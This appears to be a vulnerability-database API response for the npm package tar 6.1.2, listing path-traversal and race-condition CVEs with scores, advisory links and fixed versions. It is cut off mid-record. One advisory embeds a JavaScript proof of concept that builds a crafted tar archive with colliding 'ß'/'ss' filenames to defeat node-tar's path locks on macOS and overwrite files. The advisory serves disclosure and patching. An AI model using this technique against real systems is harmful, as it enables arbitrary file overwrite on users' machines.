Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/37947?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/37947?format=api", "purl": "pkg:npm/tar@6.1.2", "type": "npm", "namespace": "", "name": "tar", "version": "6.1.2", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "7.5.11", "latest_non_vulnerable_version": "7.5.11", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11159?format=api", "vulnerability_id": "VCID-1tz4-bphw-rbd3", "summary": "Path Traversal\nThis npm package has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37701.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37701.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-37701", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29398", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.2939", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29417", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29453", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29519", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29567", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29388", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29452", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29492", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.29495", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0011", "scoring_system": "epss", "scoring_elements": "0.2945", "published_at": "2026-04-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-37701" }, { "reference_url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37701", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37701" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37712" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/npm/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar" }, { "reference_url": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html" }, { "reference_url": "https://www.debian.org/security/2021/dsa-5008", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.debian.org/security/2021/dsa-5008" }, { "reference_url": "https://www.npmjs.com/package/tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/package/tar" }, { "reference_url": "https://www.oracle.com/security-alerts/cpuoct2021.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999731", "reference_id": "1999731", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999731" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701", "reference_id": "CVE-2021-37701", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37701" }, { "reference_url": "https://github.com/advisories/GHSA-9r2w-394v-53qc", "reference_id": "GHSA-9r2w-394v-53qc", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9r2w-394v-53qc" }, { "reference_url": "https://security.gentoo.org/glsa/202405-29", "reference_id": "GLSA-202405-29", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-29" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2021:5086", "reference_id": "RHSA-2021:5086", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2021:5086" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:0041", "reference_id": "RHSA-2022:0041", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:0041" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:0246", "reference_id": "RHSA-2022:0246", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:0246" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:0350", "reference_id": "RHSA-2022:0350", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:0350" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2022:4914", "reference_id": "RHSA-2022:4914", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2022:4914" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/39228?format=api", "purl": "pkg:npm/tar@6.1.7", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-5wr3-7131-u3aa" }, { "vulnerability": "VCID-7mtb-yaq7-77ep" }, { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-fqmy-jhdk-xfhw" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-m4hj-dq8q-67f6" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" }, { "vulnerability": "VCID-yy79-dbn9-7bd5" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@6.1.7" } ], "aliases": [ "CVE-2021-37701", "GHSA-9r2w-394v-53qc" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1tz4-bphw-rbd3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/20500?format=api", "vulnerability_id": "VCID-5wr3-7131-u3aa", "summary": "Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS\n**TITLE**: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS\n\n**AUTHOR**: Tomás Illuminati\n\n### Details\n\nA race condition vulnerability exists in `node-tar` (v7.5.3) this is to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.\n\n```typescript\n// node-tar/src/path-reservations.ts (Lines 53-62)\nreserve(paths: string[], fn: Handler) {\n paths =\n isWindows ?\n ['win32 parallelization disabled']\n : paths.map(p => {\n return stripTrailingSlashes(\n join(normalizeUnicode(p)), // <- THE PROBLEM FOR MacOS FS\n ).toLowerCase()\n })\n\n```\n\nIn MacOS the ```join(normalizeUnicode(p)), ``` FS confuses ß with ss, but this code does not. For example:\n\n``````bash\nbash-3.2$ printf \"CONTENT_SS\\n\" > collision_test_ss\nbash-3.2$ ls\ncollision_test_ss\nbash-3.2$ printf \"CONTENT_ESSZETT\\n\" > collision_test_ß\nbash-3.2$ ls -la\ntotal 8\ndrwxr-xr-x 3 testuser staff 96 Jan 19 01:25 .\ndrwxr-x---+ 82 testuser staff 2624 Jan 19 01:25 ..\n-rw-r--r-- 1 testuser staff 16 Jan 19 01:26 collision_test_ss\nbash-3.2$ \n``````\n\n---\n\n### PoC\n\n``````javascript\nconst tar = require('tar');\nconst fs = require('fs');\nconst path = require('path');\nconst { PassThrough } = require('stream');\n\nconst exploitDir = path.resolve('race_exploit_dir');\nif (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });\nfs.mkdirSync(exploitDir);\n\nconsole.log('[*] Testing...');\nconsole.log(`[*] Extraction target: ${exploitDir}`);\n\n// Construct stream\nconst stream = new PassThrough();\n\nconst contentA = 'A'.repeat(1000);\nconst contentB = 'B'.repeat(1000);\n\n// Key 1: \"f_ss\"\nconst header1 = new tar.Header({\n path: 'collision_ss',\n mode: 0o644,\n size: contentA.length,\n});\nheader1.encode();\n\n// Key 2: \"f_ß\"\nconst header2 = new tar.Header({\n path: 'collision_ß',\n mode: 0o644,\n size: contentB.length,\n});\nheader2.encode();\n\n// Write to stream\nstream.write(header1.block);\nstream.write(contentA);\nstream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding\n\nstream.write(header2.block);\nstream.write(contentB);\nstream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding\n\n// End\nstream.write(Buffer.alloc(1024));\nstream.end();\n\n// Extract\nconst extract = new tar.Unpack({\n cwd: exploitDir,\n // Ensure jobs is high enough to allow parallel processing if locks fail\n jobs: 8 \n});\n\nstream.pipe(extract);\n\nextract.on('end', () => {\n console.log('[*] Extraction complete');\n\n // Check what exists\n const files = fs.readdirSync(exploitDir);\n console.log('[*] Files in exploit dir:', files);\n files.forEach(f => {\n const p = path.join(exploitDir, f);\n const stat = fs.statSync(p);\n const content = fs.readFileSync(p, 'utf8');\n console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);\n });\n\n if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {\n console.log('\\[*] GOOD');\n } else {\n console.log('[-] No collision');\n }\n});\n\n``````\n\n---\n\n### Impact\nThis is a **Race Condition** which enables **Arbitrary File Overwrite**. This vulnerability affects users and systems using **node-tar on macOS (APFS/HFS+)**. Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive.\n\n---\n\n### Remediation\n\nUpdate `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`.\n\nUsers who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.\n\n---", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23950.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-23950.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23950", "reference_id": "", "reference_type": "", "scores": [ { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00645", "published_at": "2026-04-18T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00667", "published_at": "2026-04-02T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.0066", "published_at": "2026-04-04T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00662", "published_at": "2026-04-07T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00661", "published_at": "2026-04-08T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00654", "published_at": "2026-04-09T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00653", "published_at": "2026-04-11T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00647", "published_at": "2026-04-12T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.00648", "published_at": "2026-04-13T12:55:00Z" }, { "value": "8e-05", "scoring_system": "epss", "scoring_elements": "0.0064", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-23950" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-23950" }, { "reference_url": "https://github.com/isaacs/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-21T20:15:29Z/" } ], "url": "https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6" }, { "reference_url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-21T20:15:29Z/" } ], "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23950", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23950" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431036", "reference_id": "2431036", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431036" }, { "reference_url": "https://github.com/advisories/GHSA-r6q2-hw4h-h46w", "reference_id": "GHSA-r6q2-hw4h-h46w", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r6q2-hw4h-h46w" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2144", "reference_id": "RHSA-2026:2144", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2144" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:2926", "reference_id": "RHSA-2026:2926", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:2926" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:6192", "reference_id": "RHSA-2026:6192", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:6192" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/62097?format=api", "purl": "pkg:npm/tar@7.5.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-bj4b-gq5e-2kfy" }, { "vulnerability": "VCID-jj22-rfbv-bkg3" }, { "vulnerability": "VCID-qunt-xms1-a3cc" }, { "vulnerability": "VCID-xqpk-t1d2-yqak" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/tar@7.5.4" } ], "aliases": [ "CVE-2026-23950", "GHSA-r6q2-hw4h-h46w" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-5wr3-7131-u3aa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/11153?format=api", "vulnerability_id": "VCID-7mtb-yaq7-77ep", "summary": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nThe npm package \"tar\" (aka node-tar) has an arbitrary file creation/overwrite and arbitrary code execution vulnerability. node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37712.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-37712.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-37712", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24509", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24557", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24545", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.246", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24643", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24626", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.2458", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24737", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24698", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24623", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00085", "scoring_system": "epss", "scoring_elements": "0.24548", "published_at": "2026-04-18T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-37712" }, { "reference_url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37701", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37701" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37712" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/1739408d3122af897caefd09662bce2ea477533b" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/2f1bca027286c23e110b8dfc7efc10756fa3db5a", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/2f1bca027286c23e110b8dfc7efc10756fa3db5a" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/3aaf19b2501bbddb145d92b3322c80dcaed3c35f", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/3aaf19b2501bbddb145d92b3322c80dcaed3c35f" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/b6162c7fafe797f856564ef37f4b82747f051455" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/bb93ba243746f705092905da1955ac3b0509ba1e" }, { "reference_url": "https://github.com/isaacs/node-tar/commit/d56f790bda9fea807dd80c5083f24771dbdd6eb1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/isaacs/node-tar/commit/d56f790bda9fea807dd80c5083f24771dbdd6eb1" }, { "reference_url": "https://github.com/npm/node-tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/npm/node-tar" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html" }, { "reference_url": "https://www.debian.org/security/2021/dsa-5008", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.debian.org/security/2021/dsa-5008" }, { "reference_url": "https://www.npmjs.com/package/tar", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.npmjs.com/package/tar" }, { "reference_url": "https://www.oracle.com/security-alerts/cpuoct2021.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999739", "reference_id": "1999739", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1999739" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=993981", "reference_id": "993981", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=993981" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37712", "reference_id": "CVE-2021-37712", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37712" }, { "reference_url": "https://github.com/advisories/GHSA-qq89-hq3f-393p", "reference_id": "GHSA-qq89-hq3f-393p", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qq89-hq3f-393p" }, { "reference_url": "https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p", "reference_id": "GHSA-qq89-hq3f-393p", "reference_type": "", "scores": [ { "value": "8.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N" }, { "value": 